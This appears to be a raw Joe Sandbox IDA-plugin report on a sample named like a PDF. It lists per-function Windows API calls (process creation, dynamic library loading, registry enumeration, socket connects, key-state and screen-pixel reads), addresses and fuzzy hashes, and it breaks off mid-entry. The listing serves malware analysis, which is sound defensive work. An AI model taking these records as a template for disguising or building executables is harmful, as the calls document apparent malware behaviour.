                                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                    • String ID: `<
                                                    • API String ID: 1687444384-1628095585
                                                    • Opcode ID: bc33b17cbc76c216fca52d1e47cd229c43566e93352fecc352b2cee4a8d74471
                                                    • Instruction ID: 35b0648f8ac70e86bae34e7e1b055a137377ac70fb3770fb0495bf380a20c8e2
                                                    • Opcode Fuzzy Hash: bc33b17cbc76c216fca52d1e47cd229c43566e93352fecc352b2cee4a8d74471
                                                    • Instruction Fuzzy Hash: 2C0180B5404B00DFD722DF75C90674ABBF0EF44325F20890EE49ADB6A4CBB4A680CB55
                                                    APIs
                                                    • _memset.LIBCMT ref: 003AE33D
                                                    • _memset.LIBCMT ref: 003AE34C
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00403D00,00403D44), ref: 003AE37B
                                                    • CloseHandle.KERNEL32 ref: 003AE38D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID: D=@
                                                    • API String ID: 3277943733-2498164000
                                                    • Opcode ID: dd77853cdbe043fac6bde4699f1fb3a8e6eb5b80f04491ad52fb6836c10bdac3
                                                    • Instruction ID: 6c2415e168798f743fdf974b35c1da473c374d4f09a77271ad8e553ea71991ac
                                                    • Opcode Fuzzy Hash: dd77853cdbe043fac6bde4699f1fb3a8e6eb5b80f04491ad52fb6836c10bdac3
                                                    • Instruction Fuzzy Hash: 3BF05EF1540314BBE2125F61AC46F777E5CDF04755F008431BE08EA1A2D375AE0087AC
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003A19F3
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003A1A26
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003A1B49
                                                    • CloseHandle.KERNEL32(?), ref: 003A1BBF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: b5288c7276683cf8431f8192efd799b84e07ce49bbd1c7d86525ca9bebee9930
                                                    • Instruction ID: e0e468090f8d72538a3550f6423969b761733dcd7632f9165b0b91f58d7a2e46
                                                    • Opcode Fuzzy Hash: b5288c7276683cf8431f8192efd799b84e07ce49bbd1c7d86525ca9bebee9930
                                                    • Instruction Fuzzy Hash: 3A816270600214ABDF12AF64C886FAEBBF5EF49720F148459F905AF3D2D7B4A945CB90
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00381CB4
                                                    • VariantClear.OLEAUT32(00000013), ref: 00381D26
                                                    • VariantClear.OLEAUT32(00000000), ref: 00381D81
                                                    • VariantClear.OLEAUT32(?), ref: 00381DF8
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00381E26
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType
                                                    • String ID:
                                                    • API String ID: 4136290138-0
                                                    • Opcode ID: 7caf028ad6cc033d2d7bb988c4f8627da563d33acab3c1e6f0c67f748cedde4d
                                                    • Instruction ID: 721b5ebd124825e1bee12e112567ac209890216a61c61233cc0c9ad664937fc0
                                                    • Opcode Fuzzy Hash: 7caf028ad6cc033d2d7bb988c4f8627da563d33acab3c1e6f0c67f748cedde4d
                                                    • Instruction Fuzzy Hash: 105139B5A00209EFDB15DF58C880EAAB7B8FF4C314B158559ED59DB301E730EA56CBA0
                                                    APIs
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003A06EE
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 003A077D
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 003A079B
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 003A07E1
                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 003A07FB
                                                      • Part of subcall function 0035E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0038A574,?,?,00000000,00000008), ref: 0035E675
                                                      • Part of subcall function 0035E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0038A574,?,?,00000000,00000008), ref: 0035E699
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 327935632-0
                                                    • Opcode ID: 01d16737ce737701d4f5f6888cc9788e2399399ec8c1b3bc9f3ac995d9c84128
                                                    • Instruction ID: dc69d09052d2851b10356aad45d4c25c05c3ceeecfdee83570e0c288c656f9d1
                                                    • Opcode Fuzzy Hash: 01d16737ce737701d4f5f6888cc9788e2399399ec8c1b3bc9f3ac995d9c84128
                                                    • Instruction Fuzzy Hash: 60511575A002059FCB06EFA8C481DADB7F9EF59310B058069E916AF362DB71FE45CB90
                                                    APIs
                                                      • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A2EEF
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A2F2E
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003A2F75
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 003A2FA1
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003A2FAE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                    • String ID:
                                                    • API String ID: 3740051246-0
                                                    • Opcode ID: e1311e90cb6e7be73cd015ec80ed4bb724f6e4b2144db01b6c08fc0631cd51af
                                                    • Instruction ID: b0e0f0f7dcad104d4d5454cdaea41ceadf1b9212221ace56f960d3099a047853
                                                    • Opcode Fuzzy Hash: e1311e90cb6e7be73cd015ec80ed4bb724f6e4b2144db01b6c08fc0631cd51af
                                                    • Instruction Fuzzy Hash: D7515A71218204AFD706EF68C881E6BB7F9FF89304F00892DF5959B2A1DB70E904CB52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 81e01fbc8b88ea2fdbec43966b380c1238587bf2b6907dae40b6e68775ee907c
                                                    • Instruction ID: 8667ddfcc76a13f8664d9d1b5e5ba3a372d86b3d1ffa9780c13873cf39f4bd3c
                                                    • Opcode Fuzzy Hash: 81e01fbc8b88ea2fdbec43966b380c1238587bf2b6907dae40b6e68775ee907c
                                                    • Instruction Fuzzy Hash: EE41B439910104AFC716DF68CC44FA9BB68EB0A310F161275F959A72E1C730AD51DB90
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003912B4
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003912DD
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0039131C
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00391341
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00391349
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    • Opcode ID: 91243dddb53f8e09b07232d4a7a125c11647841e33b15c8b495d9c69500744f4
                                                    • Instruction ID: d5ea258f9cd589abc01ca6d052c3891d8c0e9c3e1c81aa1a8d8d023f00418aa1
                                                    • Opcode Fuzzy Hash: 91243dddb53f8e09b07232d4a7a125c11647841e33b15c8b495d9c69500744f4
                                                    • Instruction Fuzzy Hash: 4241FA39600105DFCF02EF64C981AAEBBF5EF09714B1484A9E94AAF362CB31ED01DB51
                                                    APIs
                                                    • GetCursorPos.USER32(000000FF), ref: 0035B64F
                                                    • ScreenToClient.USER32(00000000,000000FF), ref: 0035B66C
                                                    • GetAsyncKeyState.USER32(00000001), ref: 0035B691
                                                    • GetAsyncKeyState.USER32(00000002), ref: 0035B69F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: e3b70bb0c5c2586c864b056766bcbf76eb7bb68f6896e78b92f2df89161cfad9
                                                    • Instruction ID: 23f2c4054c1bf5edf5604d4a5fc14dbe380e34a5ade12694d2d6999916f53a56
                                                    • Opcode Fuzzy Hash: e3b70bb0c5c2586c864b056766bcbf76eb7bb68f6896e78b92f2df89161cfad9
                                                    • Instruction Fuzzy Hash: E2413E35608119FBDF1A9F64C844EE9FBB4FB05325F204319F869962A0DB30A994DF91
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 0037B369
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 0037B413
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0037B41B
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 0037B429
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0037B431
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: 84ae56fb978539c2a0e16cdeb515c4652c09691226aabde21f22af1d4dab5cca
                                                    • Instruction ID: 2c0f25f64db6ec05fbe9d5f808d4f7959c85d2938e0f64cde47fdc1633a08e30
                                                    • Opcode Fuzzy Hash: 84ae56fb978539c2a0e16cdeb515c4652c09691226aabde21f22af1d4dab5cca
                                                    • Instruction Fuzzy Hash: 5B31C07190021DEFEF15CF68D94DB9EBBB9EB04319F118229F825EA1D1C3B49954CB90
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 0037DBD7
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0037DBF4
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0037DC2C
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0037DC52
                                                    • _wcsstr.LIBCMT ref: 0037DC5C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID:
                                                    • API String ID: 3902887630-0
                                                    • Opcode ID: d90899e3d5c45d359d696dc53768ed84265cb7d458d7d1dc0d62f6d23b599f2e
                                                    • Instruction ID: c26d60b69847ac4005d964bc2a4d44a2e1c4e4a4612d2917868701de13120456
                                                    • Opcode Fuzzy Hash: d90899e3d5c45d359d696dc53768ed84265cb7d458d7d1dc0d62f6d23b599f2e
                                                    • Instruction Fuzzy Hash: 6621FF72204205ABEB279B29DC49E7B7BACDF45760F118039F80ECA191EAA5D841D3A0
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003ADEB0
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003ADED4
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003ADEEC
                                                    • GetSystemMetrics.USER32(00000004), ref: 003ADF14
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00393A1E,00000000), ref: 003ADF32
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: bbe1376f1c03890ecf61141f88cc5c281908ba979cca7be5357f485363c367b5
                                                    • Instruction ID: 9f8bd47979ffa0ad4aa03049e1283a629913b3dd27c88219428dd061be8f68b5
                                                    • Opcode Fuzzy Hash: bbe1376f1c03890ecf61141f88cc5c281908ba979cca7be5357f485363c367b5
                                                    • Instruction Fuzzy Hash: 4921A171611212AFCB264F798C48F6A77A8FB16325F160734F937DA9E0D730A860CB80
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0037BC90
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0037BCC2
                                                    • __itow.LIBCMT ref: 0037BCDA
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0037BD00
                                                    • __itow.LIBCMT ref: 0037BD11
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: 2901ea22e4ac7ed4ba3b1d99cb04ef790084c2897e8060ba2c7f9060f063a409
                                                    • Instruction ID: ef093496ffa00f3d8cdd38acd64d1af2bdc0af58da153c2c9c734aff49a40436
                                                    • Opcode Fuzzy Hash: 2901ea22e4ac7ed4ba3b1d99cb04ef790084c2897e8060ba2c7f9060f063a409
                                                    • Instruction Fuzzy Hash: 1021D875600608BBDB33AE658C46FDFBABCAF4A710F018025FA49EF181DB749D0587A1
                                                    APIs
                                                      • Part of subcall function 003450E6: _wcsncpy.LIBCMT ref: 003450FA
                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,003860C3), ref: 00386369
                                                    • GetLastError.KERNEL32(?,?,?,003860C3), ref: 00386374
                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003860C3), ref: 00386388
                                                    • _wcsrchr.LIBCMT ref: 003863AA
                                                      • Part of subcall function 00386318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003860C3), ref: 003863E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                    • String ID:
                                                    • API String ID: 3633006590-0
                                                    • Opcode ID: ccce8b44bd82f4e5e502e06d7f6c1228aaef03ea79c7516ec7eca82a2ec50677
                                                    • Instruction ID: 61dc453720a22617a3da3f6afc890792b722f0c29c8044454745045a075441b1
                                                    • Opcode Fuzzy Hash: ccce8b44bd82f4e5e502e06d7f6c1228aaef03ea79c7516ec7eca82a2ec50677
                                                    • Instruction Fuzzy Hash: 5C21C3395043159BDB27BA78AC47FEA23ACAF06360F1044B9F445DB0E5EBE0A9849B54
                                                    APIs
                                                      • Part of subcall function 0039A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0039A84E
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00398BD3
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00398BE2
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00398BFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 3701255441-0
                                                    • Opcode ID: 4b441eb05ff2552a8ee925479b5e34fc7a2a60df7ffbdd34974a1b9544588f65
                                                    • Instruction ID: d882687a6ccdb8923175375094e4b7deb3cbbddc1f5c6a30b2e9df70553c03ce
                                                    • Opcode Fuzzy Hash: 4b441eb05ff2552a8ee925479b5e34fc7a2a60df7ffbdd34974a1b9544588f65
                                                    • Instruction Fuzzy Hash: 292190312002149FDB12AF68CC85F7EB7ADAF89750F044559F956EB3A2CB74AD018B61
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 00398441
                                                    • GetForegroundWindow.USER32 ref: 00398458
                                                    • GetDC.USER32(00000000), ref: 00398494
                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 003984A0
                                                    • ReleaseDC.USER32(00000000,00000003), ref: 003984DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    • Opcode ID: b0dbf73e51ed40d5c76ce14e27954a27fae2e11d902e31da99bb2faaa7ad307d
                                                    • Instruction ID: b17d293d7134817d9f60dc38255fcf90223a7502d9af8af94940b1c2f6ee49dd
                                                    • Opcode Fuzzy Hash: b0dbf73e51ed40d5c76ce14e27954a27fae2e11d902e31da99bb2faaa7ad307d
                                                    • Instruction Fuzzy Hash: D0216275A00204AFDB01EFA5D845A5EBBE9EF49301F048879F85ADB251DB70BD00CB50
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0035AFE3
                                                    • SelectObject.GDI32(?,00000000), ref: 0035AFF2
                                                    • BeginPath.GDI32(?), ref: 0035B009
                                                    • SelectObject.GDI32(?,00000000), ref: 0035B033
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: d48dd6f6b9c3a523a5ae58f2fcff88a237080f4df8a23f16f2f3a358fa8a27b1
                                                    • Instruction ID: 3935a9393c8e6e01e470ea94aaa9ab50ed3a84c1f585f88ac9f35cc35d2d9038
